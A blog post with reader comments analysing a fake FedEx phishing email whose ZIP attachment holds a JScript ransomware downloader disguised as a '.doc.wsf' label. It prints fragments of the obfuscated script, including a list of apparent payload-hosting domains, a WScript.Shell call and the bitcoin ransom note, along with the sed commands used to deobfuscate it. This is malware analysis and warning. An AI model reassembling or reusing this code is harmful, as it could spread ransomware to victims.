Why Friends Don’t Let Friends Run Windows: Cryptolocker Downloader

Got an email, nominally from one Richard Gilmore of FedEx, concerning a parcel sent as International Next Flight (whatever that is). The Subject line read “We could not deliver your parcel, #00000665103”, although the message didn’t quite match:

Dear Customer,

This is to confirm that one or more of your parcels has been shipped.
Delivery Label is attached to this email.

Kind regards,
Richard Gilmore,
Sr. Delivery Agent.

The email address had nothing to do with FedEx, of course, and my filters tagged it as spam.

The “label” came in a ZIP file: Label_00000665103.zip

Extracting the “label” produced what would look like an MS Word file, if you were so trusting as to hide extensions of “known” filetypes and didn’t worry when you saw a file still sporting a DOC extension: Label_00000665103.doc.wsf

Handing that to VirusTotal produces no surprise at all:

VirusTotal Report

VirusTotal Report

The file contains one very long line, the first chunk of which suggests it’s up to no good:

<job><script language=JScript>var a59253 = '+"HKCU"+cs'; var a59168 = '"); fp.WriteLine(" '; var a5988 = ';} else if('; var a59196 = 'gth;i'; var a59160 = 'fp.W'; var a59261 = 'ion"+c'; var a5999 = 's(f'; var a59254 = '+"SOFTWARE"+';

After a bit of poking, I applied a few minutes of sed reformatting, manual cleanup, and sorting:

sed 's/; var a/;\n/g' Label_00000665103.doc.wsf > lines.txt
... fix a few lines ...
sort -n lines.txt > sort.txt

Which produced a file starting out like this:

<job><script language=JScript>
590 = 'var id="TRIB9RMvAFl04U4Fi7L6RNk9ZowJ2sj_fIrO0WiXGlXd53j6oENCCFDZ9NbVubN-vvJltoR8Wf4_";d';
591 = '="1vcs62wsoYZNc4TdwqgsG5965bDt3mNYW"; var bc="0.52';
592 = '189"; var ld=0;';
593 = ' var cq';
594 = '=S';
595 = 'tri';
596 = 'ng.f';
597 = 'romCharCode(34);';
598 = ' var cs';
599 = '=Strin';
5910 = 'g.fromCh';
5911 = 'ar';
5912 = 'Code(92); var ll';
5913 = '=["32jelen.pl","v';
5914 = 'iktoriascho';
5915 = 'ol.ru","blende';
5916 = 'r.com.br';
5917 = '","pasargad1007.c';
5918 = 'om","www.unit';
5919 = 'ed-systems.it"';
5920 = ']; v';
5921 = 'ar ';
5922 = 'ws=WScript.Cre';
5923 = 'ateObject(';
5924 = '"WScript.Shell';
5925 = '"); v';
5926 = 'ar';
5927 = ' fn=ws';
5928 = '.Expa';
5929 = 'ndEnv';
5930 = 'ironme';
5931 = 'ntString';
... snippage ...

Even without pasting the fragments back together, you can puzzle out the punchline:

59108 = 't",true); fp.Write';
59109 = 'Line("ATTEN';
59110 = 'TION!"); fp.Wr';
59111 = 'ite';
59112 = 'Line(';
59113 = '""); fp.W';
59114 = 'riteLine("All';
59115 = ' your d';
59116 = 'ocuments, p';
59117 = 'hotos';
59118 = ', databases and ot';
59119 = 'her import';
59120 = 'ant ';
59121 = 'pers';
59122 = 'onal fil';
59123 = 'es"); fp.';
59124 = 'Wri';
59125 = 'te';
59126 = 'Line(';
59127 = '"were e';
59128 = 'ncrypted usi';
59129 = 'ng strong RSA-1024';
59130 = ' algorithm with ';
59131 = 'a uniqu';
59132 = 'e key."); fp.Write';
59133 = 'Line(';
59134 = '"To restor';
59135 = 'e your files you h';
59136 = 'ave to pay "+bc+" ';
59137 = 'BTC (bitcoin';
59138 = 's)."); fp.Wri';

Huh. CryptoLocker returns from the dead! Right now, 0.52 BTC = $316.15, so I guess I can drop that into the jar of money saved by running Linux.

If those emails didn’t work so well, they wouldn’t send them…

  1. #1 by scruss2 on 2016-09-29 - 10:58

    Yep. The good folks at Papertrail Paperworks and press were hit by this while I was taking a course with them. All of their referene documents and teaching materials are effectively gone. So is the source code they’re working on for a microcontroller driver for their Monotype Caster, a metal type caster that’s a delightful mix of hydraulics, electro-pneumatics and molten lead …

    • #2 by Red County Pete on 2016-09-29 - 11:09

      FWIW, I have two USB backup drives, and swap them weekly. If I get encrypted, I can get week-old data onto a clean machine. Seems like pretty cheap insurance to me.

      “Blessed are the pessimists, for they have made backups.”

    • #3 by Ed on 2016-09-30 - 12:08

      On the positive side of the ledger, now they have a really great backup strategy. Right? [sigh]

  2. #4 by Red County Pete on 2016-09-29 - 11:04

    I’m lucky, spam shows up maybe once every month or so, though having a quiet email presence helps. [grin] Usually, I’ll trash it without opening, to avoid autorun html crap. On very rare occasions, it’s some gubbage from a family member.

    With MalwareSoft’s windows 7 update policies starting in October, I’ll keep one laptop on Win 7, but will disable WiFi internet access, either by fiddling with the router permissions or disable WiFi altogether. That will be the Quicken/tax/business machine. When the kitchen rebuilding festivities end (Thanksgiving-ish–got a much better price for cabinets and counters than we expected), I’ll get a refurbished laptop and set up a Linux distro (Slack, I think) on it. If KMyMoney works out, I’ll deprecate Quicken. After that, I’ll convert the desktop machine, though I want to see if I can get Turbocad to run under Wine.

    The AskWoody dot com site has lots of information on the update stuff for Windows users…

    (Rumor has it some of the encryptors don’t bother to send a decryption key after they get the money. Color me shocked.)

    • #5 by Ed on 2016-09-30 - 12:06

      My main email goes through pobox.com and their spam filters work wonderfully well. Relatively few false positives, mostly for messages from known-good organizations sending bleating requests for donations.

      some of the encryptors don’t bother to send a decryption key after they get the money

      Talk about poisoning the well: that destroys the trust you’re supposed to have in a criminal. Eventually, nobody will even attempt to pay the ransom!

  3. #6 by eriklscott on 2016-09-29 - 12:13

    What I find worrisome is the 24/55 virus scoring. I’m not slamming on any one product, but I would have felt a lot better if that was, say, 53/55. Sigh. But we should be careful with our advice – if Linux gets more popular to attack then the cognoscenti will have to move to OpenBSD.

    • #7 by Ed on 2016-09-30 - 12:00

      I think the overall score has more to do with when the signature databases get updated than anything else: plotting score vs. time for a specific file would be interesting.

  1. Another Look Inside Ransomware | The Arts Mechanical